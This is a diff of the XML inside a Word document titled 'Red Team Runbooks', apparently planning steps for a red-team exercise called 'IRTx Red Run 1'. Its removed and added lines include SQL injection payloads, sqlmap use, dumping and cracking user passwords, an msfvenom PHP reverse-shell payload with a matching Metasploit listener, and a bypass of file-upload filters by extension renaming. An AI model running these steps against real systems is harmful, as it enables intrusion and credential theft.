-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">gobuser dir -u $WEB -w </w:t>
-            </w:r>
             <w:r>
               <w:rPr>
                 <w:i w:val="false"/>
@@ -2400,13 +2359,13 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>“/usr/share/seclists/Discovery/Web-Content/raft-small-words.txt”</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+              <w:t>Look for the entry point for SQL injections</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2464,7 +2423,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2492,7 +2451,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2545,13 +2504,13 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Test login page for SQLi</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+              <w:t>Test  page for SQLi</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2572,117 +2531,33 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Test the login for basic SQLi with the following payloads</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">‘ </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>OR 1=1; --</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>admin--</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>or use SQLmap</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">plus more </w:t>
-            </w:r>
-            <w:hyperlink r:id="rId2">
-              <w:r>
-                <w:rPr>
-                  <w:rStyle w:val="InternetLink"/>
-                  <w:kern w:val="0"/>
-                  <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-                </w:rPr>
-                <w:t>https://book.hacktricks.xyz/pentesting-web/sql-injection</w:t>
-              </w:r>
-            </w:hyperlink>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+              <w:t>Manually exploit or use SQLmap with an intercepted request saved as a file from burpsuite</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>sqlmap -r request.file</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2740,7 +2615,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2768,7 +2643,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2821,13 +2696,13 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Perform PrivEsc once logged</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+              <w:t>Dump tables for credentials</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2856,13 +2731,13 @@
                 <w:shd w:fill="auto" w:val="clear"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Once successfully logged in as admin, determine how to perform privesc and go from there.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+              <w:t>Dump the table and attempt to crack/view passwords of user table</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2966,12 +2841,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1525"/>
-        <w:gridCol w:w="497"/>
+        <w:gridCol w:w="1523"/>
+        <w:gridCol w:w="499"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1760"/>
-        <w:gridCol w:w="1282"/>
+        <w:gridCol w:w="1762"/>
+        <w:gridCol w:w="1280"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -3420,14 +3295,7 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t xml:space="preserve">Msfvenom, metasploit, </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>burpsuite</w:t>
+              <w:t>Msfvenom, metasploit, burpsuite</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3438,7 +3306,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1525" w:type="dxa"/>
+            <w:tcW w:w="1523" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3485,7 +3353,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8119" w:type="dxa"/>
+            <w:tcW w:w="8121" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -3506,14 +3374,7 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t xml:space="preserve">This is attack is </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">to target insecure/unsanatised file uploads. A malicious file will be uploaded that will create a reverse shell on the host machine for the attacker to connect to </w:t>
+              <w:t xml:space="preserve">This is attack is to target insecure/unsanatised file uploads. A malicious file will be uploaded that will create a reverse shell on the host machine for the attacker to connect to </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3552,7 +3413,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3580,7 +3441,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3633,13 +3494,13 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Create malicious file</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+              <w:t>Locate upload page</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -3655,60 +3516,18 @@
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="0" w:name="msfvenom-command"/>
-            <w:bookmarkEnd w:id="0"/>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=9001 -f </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>php</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -o </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>rev.php</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Locate the page where files can be uploaded and test with a test file</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -3766,7 +3585,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3794,7 +3613,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3847,61 +3666,42 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Listen for shell</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+              <w:t>Upload file</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="PreformattedText"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="1" w:name="listener-command"/>
-            <w:bookmarkEnd w:id="1"/>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.0.10; set lport 9001; exploit"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:i w:val="false"/>
+                <w:iCs w:val="false"/>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">If there is no sanitisation go to the php file and open it creating the reverse shell. </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -3959,7 +3759,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3987,7 +3787,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -4040,13 +3840,13 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Upload file</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+              <w:t>Security bypass</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -4069,13 +3869,13 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Locate the upload page. If there is no sanitisation go to the php file and open it creating the reverse shell. If there appears to some security, change the file extension to .php.jpeg, intercept request and change back to .php</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+              <w:t>If there appears to some security e.g only allow images, change the file extension to .php.jpeg, intercept request and change back to .php</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -4133,7 +3933,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -4161,7 +3961,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -4220,7 +4020,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -4255,7 +4055,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>

--- a/Red Team Runbooks.docx
+++ b/Red Team Runbooks.docx
@@ -1,13 +1,10 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
         <w:rPr>
           <w:sz w:val="56"/>
           <w:szCs w:val="56"/>
@@ -23,21 +20,12 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:w="9645" w:type="dxa"/>
-        <w:jc w:val="left"/>
-        <w:tblInd w:w="0" w:type="dxa"/>
         <w:tblLayout w:type="fixed"/>
-        <w:tblCellMar>
-          <w:top w:w="0" w:type="dxa"/>
-          <w:left w:w="108" w:type="dxa"/>
-          <w:bottom w:w="0" w:type="dxa"/>
-          <w:right w:w="108" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1523"/>
+        <w:gridCol w:w="1524"/>
         <w:gridCol w:w="499"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
@@ -46,22 +34,18 @@
       </w:tblGrid>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="497" w:hRule="atLeast"/>
+          <w:trHeight w:val="497"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -79,42 +63,43 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>IRTx Red Run 1</w:t>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>IRTx</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
